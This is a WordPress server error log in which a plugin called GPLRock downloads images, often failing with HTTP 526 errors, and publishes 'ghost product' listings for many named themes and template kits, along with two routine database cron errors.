techone-electronics-multipurpose-woocommerce-theme-rtl-supported: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4dd670c1.webp [05-Apr-2026 08:08:28 UTC] GPLRock: Ghost product published with image - Product ID: techone-electronics-multipurpose-woocommerce-theme-rtl-supported [05-Apr-2026 08:08:28 UTC] GPLRock: Image downloaded successfully for product shine-woocommerce-responsive-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d172a18.webp [05-Apr-2026 08:08:28 UTC] GPLRock: Using pre-downloaded image for product shine-woocommerce-responsive-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d172a18.webp [05-Apr-2026 08:08:28 UTC] GPLRock: Ghost product published with image - Product ID: shine-woocommerce-responsive-theme [05-Apr-2026 08:08:28 UTC] GPLRock: Image download failed for product colza-mining-industry-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:31 UTC] GPLRock: Image download failed for product colza-mining-industry-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/colza---mining--industry-wordpress-theme-14764.webp for product colza-mining-industry-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:33 UTC] GPLRock: Image download failed for product colza-mining-industry-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:35 UTC] GPLRock: Image download failed for product colza-mining-industry-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/colza---mining--industry-wordpress-theme-14764.webp for product colza-mining-industry-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:37 UTC] GPLRock WARNING: Image download failed for product colza-mining-industry-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/colza---mining--industry-wordpress-theme-14764.webp [05-Apr-2026 08:08:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: colza-mining-industry-wordpress-theme [05-Apr-2026 08:08:37 UTC] GPLRock: Image download failed for product adsett-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:39 UTC] GPLRock: Image download failed for product adsett-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adsett---architecture-wordpress-theme-22307.webp for product adsett-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:42 UTC] GPLRock: Image download failed for product adsett-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:44 UTC] GPLRock: Image download failed for product adsett-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adsett---architecture-wordpress-theme-22307.webp for product adsett-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:46 UTC] GPLRock WARNING: Image download failed for product adsett-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/adsett---architecture-wordpress-theme-22307.webp [05-Apr-2026 08:08:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adsett-architecture-wordpress-theme [05-Apr-2026 08:08:46 UTC] GPLRock: Image download failed for product podgorica-environment-and-renewable-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:48 UTC] GPLRock: Image download failed for product podgorica-environment-and-renewable-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/podgorica---environment-and-renewable-energy-wordpress-theme-20575.webp for product podgorica-environment-and-renewable-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:50 UTC] GPLRock: Image download failed for product podgorica-environment-and-renewable-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:52 UTC] GPLRock: Image download failed for product podgorica-environment-and-renewable-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/podgorica---environment-and-renewable-energy-wordpress-theme-20575.webp for product podgorica-environment-and-renewable-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:54 UTC] GPLRock WARNING: Image download failed for product podgorica-environment-and-renewable-energy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/podgorica---environment-and-renewable-energy-wordpress-theme-20575.webp [05-Apr-2026 08:08:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: podgorica-environment-and-renewable-energy-wordpress-theme [05-Apr-2026 08:08:55 UTC] GPLRock: Image download failed for product wooxon-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:57 UTC] GPLRock: Image download failed for product wooxon-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wooxon---woocommerce-wordpress-theme-20835.webp for product wooxon-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:59 UTC] GPLRock: Image download failed for product wooxon-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:01 UTC] GPLRock: Image download failed for product wooxon-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wooxon---woocommerce-wordpress-theme-20835.webp for product wooxon-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:09:03 UTC] GPLRock WARNING: Image download failed for product wooxon-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wooxon---woocommerce-wordpress-theme-20835.webp [05-Apr-2026 08:09:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wooxon-woocommerce-wordpress-theme [05-Apr-2026 08:09:03 UTC] GPLRock: Image downloaded successfully for product 15zine-magazine-newspaper-blog-news-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37b5a274.webp [05-Apr-2026 08:09:03 UTC] GPLRock: Using pre-downloaded image for product 15zine-magazine-newspaper-blog-news-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37b5a274.webp [05-Apr-2026 08:09:03 UTC] GPLRock: Ghost product published with image - Product ID: 15zine-magazine-newspaper-blog-news-wordpress-theme [05-Apr-2026 08:09:03 UTC] GPLRock: Image download failed for product sport-club-a-wordpress-theme-for-your-small-local-team (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:05 UTC] GPLRock: Image download failed for product sport-club-a-wordpress-theme-for-your-small-local-team (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sport-club---a-wordpress-theme-for-your-small-local-team-19093.webp for product sport-club-a-wordpress-theme-for-your-small-local-team after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:09:08 UTC] GPLRock: Image download failed for product sport-club-a-wordpress-theme-for-your-small-local-team (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:10 UTC] GPLRock: Image download failed for product sport-club-a-wordpress-theme-for-your-small-local-team (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sport-club---a-wordpress-theme-for-your-small-local-team-19093.webp for product sport-club-a-wordpress-theme-for-your-small-local-team after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:09:12 UTC] GPLRock WARNING: Image download failed for product sport-club-a-wordpress-theme-for-your-small-local-team. URL: https://meldwp.com/wp-content/uploads/sport-club---a-wordpress-theme-for-your-small-local-team-19093.webp [05-Apr-2026 08:09:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sport-club-a-wordpress-theme-for-your-small-local-team [05-Apr-2026 08:09:12 UTC] GPLRock: Image download failed for product minimog-next-gen-multipurpose-shopify-theme-grade-a (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:14 UTC] GPLRock: Image download failed for product minimog-next-gen-multipurpose-shopify-theme-grade-a (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minimog---next-gen-multipurpose-shopify-theme-grade-a-24961.webp for product minimog-next-gen-multipurpose-shopify-theme-grade-a after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:09:16 UTC] GPLRock: Image download failed for product minimog-next-gen-multipurpose-shopify-theme-grade-a (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:18 UTC] GPLRock: Image download failed for product minimog-next-gen-multipurpose-shopify-theme-grade-a (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:09:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minimog---next-gen-multipurpose-shopify-theme-grade-a-24961.webp for product minimog-next-gen-multipurpose-shopify-theme-grade-a after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:09:20 UTC] GPLRock WARNING: Image download failed for product minimog-next-gen-multipurpose-shopify-theme-grade-a. URL: https://meldwp.com/wp-content/uploads/minimog---next-gen-multipurpose-shopify-theme-grade-a-24961.webp [05-Apr-2026 08:09:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: minimog-next-gen-multipurpose-shopify-theme-grade-a [05-Apr-2026 08:09:45 UTC] GPLRock: Image downloaded successfully for product eis-ice-cream-shop-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-efd31ba1.webp [05-Apr-2026 08:09:45 UTC] GPLRock: Using pre-downloaded image for product eis-ice-cream-shop-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-efd31ba1.webp [05-Apr-2026 08:09:45 UTC] GPLRock: Ghost product published with image - Product ID: eis-ice-cream-shop-template-kit [05-Apr-2026 08:09:47 UTC] GPLRock: Image downloaded successfully for product eginary-online-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6c4e7f5.webp [05-Apr-2026 08:09:47 UTC] GPLRock: Using pre-downloaded image for product eginary-online-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6c4e7f5.webp [05-Apr-2026 08:09:47 UTC] GPLRock: Ghost product published with image - Product ID: eginary-online-education-elementor-template-kit [05-Apr-2026 08:09:48 UTC] GPLRock: Image downloaded successfully for product eflorist-flower-boutique-decoration-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c35b289.webp [05-Apr-2026 08:09:48 UTC] GPLRock: Using pre-downloaded image for product eflorist-flower-boutique-decoration-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c35b289.webp [05-Apr-2026 08:09:48 UTC] GPLRock: Ghost product published with image - Product ID: eflorist-flower-boutique-decoration-elementor-template-kit [05-Apr-2026 08:09:49 UTC] GPLRock: Image downloaded successfully for product eduti-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d53dc3f3.webp [05-Apr-2026 08:09:49 UTC] GPLRock: Using pre-downloaded image for product eduti-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d53dc3f3.webp [05-Apr-2026 08:09:49 UTC] GPLRock: Ghost product published with image - Product ID: eduti-education-elementor-template-kit [05-Apr-2026 08:09:51 UTC] GPLRock: Image downloaded successfully for product edus-online-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f7d2d119.webp [05-Apr-2026 08:09:51 UTC] GPLRock: Using pre-downloaded image for product edus-online-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f7d2d119.webp [05-Apr-2026 08:09:51 UTC] GPLRock: Ghost product published with image - Product ID: edus-online-education-elementor-template-kit [05-Apr-2026 08:09:52 UTC] GPLRock: Image downloaded successfully for product edunika-online-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4012140.webp [05-Apr-2026 08:09:52 UTC] GPLRock: Using pre-downloaded image for product edunika-online-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4012140.webp [05-Apr-2026 08:09:52 UTC] GPLRock: Ghost product published with image - Product ID: edunika-online-education-elementor-template-kit [05-Apr-2026 08:09:54 UTC] GPLRock: Image downloaded successfully for product edulife-life-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-207ecb3f.webp [05-Apr-2026 08:09:54 UTC] GPLRock: Using pre-downloaded image for product edulife-life-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-207ecb3f.webp [05-Apr-2026 08:09:54 UTC] GPLRock: Ghost product published with image - Product ID: edulife-life-coach-elementor-template-kit [05-Apr-2026 08:09:55 UTC] GPLRock: Image downloaded successfully for product edukids-children-kindergarten-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78c9bc9d.webp [05-Apr-2026 08:09:55 UTC] GPLRock: Using pre-downloaded image for product edukids-children-kindergarten-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78c9bc9d.webp [05-Apr-2026 08:09:55 UTC] GPLRock: Ghost product published with image - Product ID: edukids-children-kindergarten-elementor-template-kit [05-Apr-2026 08:09:57 UTC] GPLRock: Image downloaded successfully for product edudemy-school-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5892fb8.jpg [05-Apr-2026 08:09:57 UTC] GPLRock: Using pre-downloaded image for product edudemy-school-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5892fb8.jpg [05-Apr-2026 08:09:57 UTC] GPLRock: Ghost product published with image - Product ID: edudemy-school-education-elementor-template-kit [05-Apr-2026 08:09:58 UTC] GPLRock: Image downloaded successfully for product educita-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95b7e9c8.webp [05-Apr-2026 08:09:58 UTC] GPLRock: Using pre-downloaded image for product educita-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95b7e9c8.webp [05-Apr-2026 08:09:58 UTC] GPLRock: Ghost product published with image - Product ID: educita-education-elementor-template-kit [05-Apr-2026 08:10:53 UTC] GPLRock: Image downloaded successfully for product devita-multipurpose-theme-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5935c5e0.jpg [05-Apr-2026 08:10:53 UTC] GPLRock: Using pre-downloaded image for product devita-multipurpose-theme-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5935c5e0.jpg [05-Apr-2026 08:10:53 UTC] GPLRock: Ghost product published with image - Product ID: devita-multipurpose-theme-for-woocommerce [05-Apr-2026 08:10:55 UTC] GPLRock: Image downloaded successfully for product alinan-personal-blog-vlog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-519ce0ad.jpg [05-Apr-2026 08:10:55 UTC] GPLRock: Using pre-downloaded image for product alinan-personal-blog-vlog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-519ce0ad.jpg [05-Apr-2026 08:10:55 UTC] GPLRock: Ghost product published with image - Product ID: alinan-personal-blog-vlog-wordpress-theme [05-Apr-2026 08:10:56 UTC] GPLRock: Image downloaded successfully for product digixon-digital-marketing-strategy-consulting-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2fabd34d.jpg [05-Apr-2026 08:10:56 UTC] GPLRock: Using pre-downloaded image for product digixon-digital-marketing-strategy-consulting-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2fabd34d.jpg [05-Apr-2026 08:10:56 UTC] GPLRock: Ghost product published with image - Product ID: digixon-digital-marketing-strategy-consulting-wp-theme [05-Apr-2026 08:10:58 UTC] GPLRock: Image downloaded successfully for product domex-night-club-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90443fd4.jpg [05-Apr-2026 08:10:58 UTC] GPLRock: Using pre-downloaded image for product domex-night-club-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90443fd4.jpg [05-Apr-2026 08:10:58 UTC] GPLRock: Ghost product published with image - Product ID: domex-night-club-wordpress-theme [05-Apr-2026 08:11:00 UTC] GPLRock: Image downloaded successfully for product green-thumb-gardening-landscaping-services-wp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b14cd8bb.jpg [05-Apr-2026 08:11:00 UTC] GPLRock: Using pre-downloaded image for product green-thumb-gardening-landscaping-services-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b14cd8bb.jpg [05-Apr-2026 08:11:00 UTC] GPLRock: Ghost product published with image - Product ID: green-thumb-gardening-landscaping-services-wp [05-Apr-2026 08:11:01 UTC] GPLRock: Image downloaded successfully for product goral-smartwatch-single-product-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a7e4e5d.jpg [05-Apr-2026 08:11:02 UTC] GPLRock: Using pre-downloaded image for product goral-smartwatch-single-product-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a7e4e5d.jpg [05-Apr-2026 08:11:02 UTC] GPLRock: Ghost product published with image - Product ID: goral-smartwatch-single-product-woocommerce-wordpress-theme [05-Apr-2026 08:11:05 UTC] GPLRock: Image downloaded successfully for product hompark-real-estate-luxury-homes-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-12229644.png [05-Apr-2026 08:11:05 UTC] GPLRock: Using pre-downloaded image for product hompark-real-estate-luxury-homes-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-12229644.png [05-Apr-2026 08:11:05 UTC] GPLRock: Ghost product published with image - Product ID: hompark-real-estate-luxury-homes-theme [05-Apr-2026 08:11:06 UTC] GPLRock: Image downloaded successfully for product advance-amp-ads (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67219ad7.png [05-Apr-2026 08:11:06 UTC] GPLRock: Using pre-downloaded image for product advance-amp-ads: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67219ad7.png [05-Apr-2026 08:11:06 UTC] GPLRock: Ghost product published with image - Product ID: advance-amp-ads [05-Apr-2026 08:11:08 UTC] GPLRock: Image downloaded successfully for product wp-forms-support-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-21e29238.png [05-Apr-2026 08:11:08 UTC] GPLRock: Using pre-downloaded image for product wp-forms-support-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-21e29238.png [05-Apr-2026 08:11:08 UTC] GPLRock: Ghost product published with image - Product ID: wp-forms-support-for-amp [05-Apr-2026 08:11:09 UTC] GPLRock: Image downloaded successfully for product wpml-integration-with-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8895303c.png [05-Apr-2026 08:11:09 UTC] GPLRock: Using pre-downloaded image for product wpml-integration-with-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8895303c.png [05-Apr-2026 08:11:09 UTC] GPLRock: Ghost product published with image - Product ID: wpml-integration-with-amp [05-Apr-2026 08:12:34 UTC] GPLRock: Image downloaded successfully for product cripto-cryptocurrency-bitcoin-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a84c74f.webp [05-Apr-2026 08:12:34 UTC] GPLRock: Using pre-downloaded image for product cripto-cryptocurrency-bitcoin-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a84c74f.webp [05-Apr-2026 08:12:34 UTC] GPLRock: Ghost product published with image - Product ID: cripto-cryptocurrency-bitcoin-elementor-template-kit [05-Apr-2026 08:12:36 UTC] GPLRock: Image downloaded successfully for product corner-construction-building-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5c6120b9.webp [05-Apr-2026 08:12:36 UTC] GPLRock: Using pre-downloaded image for product corner-construction-building-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5c6120b9.webp [05-Apr-2026 08:12:36 UTC] GPLRock: Ghost product published with image - Product ID: corner-construction-building-elementor-template-kit [05-Apr-2026 08:12:37 UTC] GPLRock: Image downloaded successfully for product corn-medical-prevention-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1d5896d2.webp [05-Apr-2026 08:12:37 UTC] GPLRock: Using pre-downloaded image for product corn-medical-prevention-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1d5896d2.webp [05-Apr-2026 08:12:37 UTC] GPLRock: Ghost product published with image - Product ID: corn-medical-prevention-elementor-template-kit [05-Apr-2026 08:12:39 UTC] GPLRock: Image downloaded successfully for product coprot-factory-industrial-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0f9b5ee.webp [05-Apr-2026 08:12:39 UTC] GPLRock: Using pre-downloaded image for product coprot-factory-industrial-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0f9b5ee.webp [05-Apr-2026 08:12:39 UTC] GPLRock: Ghost product published with image - Product ID: coprot-factory-industrial-elementor-template-kit [05-Apr-2026 08:12:41 UTC] GPLRock: Image downloaded successfully for product cooper-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a9be7e09.webp [05-Apr-2026 08:12:41 UTC] GPLRock: Using pre-downloaded image for product cooper-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a9be7e09.webp [05-Apr-2026 08:12:41 UTC] GPLRock: Ghost product published with image - Product ID: cooper-studio-elementor-template-kit [05-Apr-2026 08:12:42 UTC] GPLRock: Image downloaded successfully for product cooked-catering-restaurant-website-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f42ae0d0.webp [05-Apr-2026 08:12:42 UTC] GPLRock: Using pre-downloaded image for product cooked-catering-restaurant-website-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f42ae0d0.webp [05-Apr-2026 08:12:42 UTC] GPLRock: Ghost product published with image - Product ID: cooked-catering-restaurant-website-elementor-template-kit [05-Apr-2026 08:12:43 UTC] GPLRock: Image downloaded successfully for product concrete-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b2382239.webp [05-Apr-2026 08:12:44 UTC] GPLRock: Using pre-downloaded image for product concrete-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b2382239.webp [05-Apr-2026 08:12:44 UTC] GPLRock: Ghost product published with image - Product ID: concrete-construction-elementor-template-kit [05-Apr-2026 08:12:45 UTC] GPLRock: Image downloaded successfully for product comed-comedian-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b6d0364.jpg [05-Apr-2026 08:12:45 UTC] GPLRock: Using pre-downloaded image for product comed-comedian-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b6d0364.jpg [05-Apr-2026 08:12:45 UTC] GPLRock: Ghost product published with image - Product ID: comed-comedian-elementor-template-kit [05-Apr-2026 08:12:47 UTC] GPLRock: Image downloaded successfully for product cologne-perfume-fragrance-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2ff02a2.jpg [05-Apr-2026 08:12:47 UTC] GPLRock: Using pre-downloaded image for product cologne-perfume-fragrance-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2ff02a2.jpg [05-Apr-2026 08:12:47 UTC] GPLRock: Ghost product published with image - Product ID: cologne-perfume-fragrance-elementor-template-kit [05-Apr-2026 08:12:48 UTC] GPLRock: Image downloaded successfully for product coliv-restaurant-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b67def7.webp [05-Apr-2026 08:12:48 UTC] GPLRock: Using pre-downloaded image for product coliv-restaurant-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b67def7.webp [05-Apr-2026 08:12:48 UTC] GPLRock: Ghost product published with image - Product ID: coliv-restaurant-template-kit [05-Apr-2026 08:12:50 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 08:12:50 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775376770.2211270332336425781250', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 08:14:50 UTC] GPLRock: Image downloaded successfully for product manice-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db996226.webp [05-Apr-2026 08:14:50 UTC] GPLRock: Using pre-downloaded image for product manice-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db996226.webp [05-Apr-2026 08:14:50 UTC] GPLRock: Ghost product published with image - Product ID: manice-business-elementor-template-kit [05-Apr-2026 08:14:52 UTC] GPLRock: Image downloaded successfully for product mangan-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f34b5293.webp [05-Apr-2026 08:14:52 UTC] GPLRock: Using pre-downloaded image for product mangan-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f34b5293.webp [05-Apr-2026 08:14:52 UTC] GPLRock: Ghost product published with image - Product ID: mangan-restaurant-elementor-template-kit [05-Apr-2026 08:14:53 UTC] GPLRock: Image downloaded successfully for product manaka-architecture-interior-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d1f9a0d9.webp [05-Apr-2026 08:14:53 UTC] GPLRock: Using pre-downloaded image for product manaka-architecture-interior-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d1f9a0d9.webp [05-Apr-2026 08:14:53 UTC] GPLRock: Ghost product published with image - Product ID: 